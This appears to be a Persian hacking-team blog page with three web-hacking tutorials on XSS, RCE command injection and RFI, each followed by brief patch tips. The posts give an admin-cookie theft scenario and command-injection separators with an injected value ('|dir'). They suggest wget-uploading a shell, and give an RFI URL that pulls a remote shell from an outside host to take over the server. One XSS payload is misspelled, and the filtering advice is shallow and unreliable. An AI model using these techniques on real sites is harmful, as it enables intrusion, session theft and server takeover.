تیم سایبری محمد رسول الله

خانه درباره ما تماس با ما shell package <tel> کانال <tel/>

۳ مطلب با کلمه‌ی کلیدی «اموزش هک سایت» ثبت شده است

اموزش باگ xss + پچ باگ

 

به نام خدا

 

با اموزش باگ xss از سری اموزش های وب هکینگ در خدمت شما هستیم اگر تاحالا بقیه اموزش های دورمون رو ندیدین میتونین از منو موضوعات دوره تست نفوذ وب رو انتخاب کنید

 

 

باگ xss چیست؟

این باگ شایع ترین باگ در بحث وب هکینگه که باعث اجرای اسکریپت داخل سایت میشه اما این اسکریپت در سمت کلاینت یعنی کاربر رخ میده و داخل اطلاعات سایت تاثیری نمیزاره ولی این میتونه تو حملات فیشینگ خیلی خطرناک باشه کار با این باگ خیلی سادست و فقط باید جاوا اسکریپت رو بلد باشین  این باگ در ورودی ها رخ میده

ورودی میتونه هر چیزی مثل بخش جستوجو کامنت ها و مکان هایی که یک ورودی رو میگیره باشه اما تا اینجا شاید یه باگ بدرد نخور به نظر بیاد بزارین برای اینکه بهتر اهمیتش رو متوجه بشین یک سناریو رو باهم دیگه پیش بریم

( البته هک کردن وبسایت در صورتی که ادمین مطلع نباشه جرمه و جریمه سنگینی داره(کمش زندانه) اینکه با فیلترشکن کسی شمارو نمیشناسه رو بندازین دور... )

 

 

اموزش باگ xss :

ببینید به عنوان مثال سایت ما باگ xss داره خب ما میایم یک کد جوا مینویسیم و با اون میگیم کد جاوا اسکریپتی که در فلان ادرس هست رو داخل سایت اجرا کنه داخل کد جاوا اسکریپتی که داخل هاستمون ذخیره کردیم هم میگیم بیاد  کوکی ها و سشن های کاربران رو در یک فایل داخل هاست ذخیره کنه

حالا ادرس سایتی که اسیب پذیره رو به ادمین سایت میدیم و اونرو مجبور میکنیم که کلیک کنه مثلا میگیم این لینک خرابه یا چرا اینجوریه این صفحه و... بعد از کلیک کردن اون کوکی ها و سشنش برای ما سیو میشه و ما میتونیم به راحتی وارد پنل ادمین اون سایته بشیم J به همین راحتی

 

 

این فقط یک سناریو ساده بود که تعریف کردیم تا اونهایی که سایت دارن بیشتر توجه کنن برای تست این باگ هم میتونید تکه کد زیر رو داخل مرورگر خودتون(حتما فایرفاکس باشه) تست بزنین

<script> alet(“xss bug!”) </script>

به چیزی مثل زیر برخوردین یعنی باگ داره

 

 

پچ باگ xss :

برای پچ کردن این باگ هم باید ورودی هارو فیلتر کنین مثلا عباراتی مثل

<script>  و </script> و...

 

همچنین از افزونه های امنیتی در وردپرس هم میتونید استفاده کنید

جهت اطلاع ادمین سایت ها کد هایی که ماداخل سناریو گفتیم داخل اینترنت هست و نیازی به یادگیری جوا اسکریپت هم نداره! همین قدر ساده ...

هر سوال یا ابهامی داشتین داخل نظرات بگین تا پاسخگو باشیم

تیم ما هیچگونه مسئولیتی درقبال سوء استفاده برخی از افراد ندارد

۰۶ مرداد ۰۰ ، ۱۷:۴۵ ۰ نظر

اموزش باگ Rce + پچ کردن

به نام خدا

با یک قسمت دیگه از دوره اموزشی وب هکینگ در خدمتتون هستیم و قراره یک باگ خیلی خفن ساده و کاربردی رو بگیم

 

باگ rce چیست ؟

باگ rce جزو پر خطر ترین باگ ها محسوب میشه چون تمام دستورات سیستمی با دسترسی بالا ران میشه.

باگ RCE مخفف Remote Code Execution هست که متاسفانه در حال گسترش هست که توی این مطلب میخوایم روش نفوذ با باگ rce و پچ کردن با rce رو با هم یاد بگیریم

 

 

نفوذ به سیستم با باگ rce :

ما برای مثال روی یک سایتی که پینگ ایپی و سایت ها رو میگیره تست میکنیم

یعنی داخل اسکریپتش گفته شده هر ورودی که وارد شد رو بعد از دستور ping بزار و اون رو داخل ترمینال ران کن و خورجی رو نمایش بده

خب تا اینجا که باگی نیست اما میتونیم داخل ترمینال یا cmd دو دستور رو داخل یک خط وارد کنیم! و اینجا مشکل کاره J مثلا ما ادرس opensec.blog.ir رو بهش میدیم و اون دستور زیر رو داخل خط فرمان اجرا میکنه

Ping opensec.blog.ir

اما اگر این دستور رو با کاراکتر های مختلفی نظیر:

 

'|'
'||'
' | '
' || '
' |'
'&'
'&&'
';'
'$'
برای مشخص شدن فاصله ها اون هارو داخل تک کوتیشن قرار دادم خودتون هم میتونید دو طرف وسط یا... هم فاصله بزارین و تست کنین

این کامند ها کامل نیستن و کامند های دیگه ای هم هست

 

 

از هم جدا کنیم و بعدش دستور خودمون رو وارد کنیم مثل نمونه زیر اون هر دو تا رو اجرا میکنه

Opensec.blog.ir|dir

و خروجی که تون به خط فرمان میده به شکل زیره:

Ping opensec.blog.ir|dir

خروجی که به ما میده به این صورته که اول نتیجه پینگ رو نشون میده و بعد از اون اگه سیستم ویندوزی باشه لیست فایل های داخل مسیر رو نشون میده حالا اگه ما به جای این دستور ساده بادستور ویگت شل خودمون رو اپلود کنیم و از کل سرور دسترسی بگیریم چی؟ اون موقع دیگه تمام سرور هم ممکنه با سیملینک هک بشه و تمام سایت های روی سرور در خطر ان

 

اموزش پچ کردن باگ rce :

در این باگ هم شما باید ورودی ها رو کنترل کنین مثلا تعریف کنین که فلان ورودی ها غیر مجازن و بگین مثلا ورودی که میگیره از n کاراکتر بیشتر نباشه یا ورودی که میگیره n بخش بیشتر نباشه  یا یک لیست سفید تعریف کنیم و بگیم اگر غیر از این هم بود دستور ران نشه و هزاران فیلتر دیگه که میشه روی ورودی ها اعمال کرد

 

تیم ما هیچ گونه مسئولیتی در قبال سوء استفاده برخی افراد ندارد

اگر سوالی داشتین یا مطلب مشکلی داشت حتما در بخش نظرات به اشتراک بزارین

۱۷ تیر ۰۰ ، ۱۳:۴۶ ۰ نظر

هک سایت با باگ RFI + تامین امنیت

به نام خدا

با اموزش باگ rfi  در دوره اموزش های تست نفوذ وب اپلیکیشن در خدمتتونیم

 

 

 باگ RFI چیست ؟

باگ rfi جزو خطرناک ترین باگ ها محسوب میشه چون میشه با اون دسترسی سرور هم گرفت

این باگ توسط اشتباهات برنامه نویسی ایجاد میشود و مخفف Remote File Inclusion است که مستقیما باعث اجرای شل اسکریپت در سرور شود برای پچ کردن این باگ نیازه دستورات http:// , https:// در ورودی ها ممنوع بشه و از فایروال ها استفاده بشه

 

 

اموزش باگ RFI

برای پیدا کردن باگ باید ورودی های مشکوک رو مورد تست قرار بدین

و میتونین از شل های مختلفی مثل :c99 , alpha , c100 , minishell , … هم استفاده کنین

اول باید شل خودتون رو داخل یک هاست اپلود کین کنین ( باید پسوند فایل رو از پی اچ پی به .txt تغییر بدین )

به عنوان مثال به ادرس زیر توجه کنید

http://target.com/intex.php?page=index.php

در ورودی بالا وبسایت index رو به عنوان ورودی میگیره حالا اگر ما بجای index ادرس شل خودمون رو بدیم شل ما رو اجرا میکنه! و دسترسی ادمین از کل سایت یا سرور میگیریم

و url نهایی ما به شکل زیر میشه

http://target.com/index.php?page=http://host.com/myShell.txt

 

تیم ما هیچ گونه مسئولیتی در قبال سوء استفاده برخی افراد ندارد!

اگر سوال یا ابهامی بود در بخش نظرات مطرح کنید

۱۱ تیر ۰۰ ، ۱۷:۲۹ ۰ نظر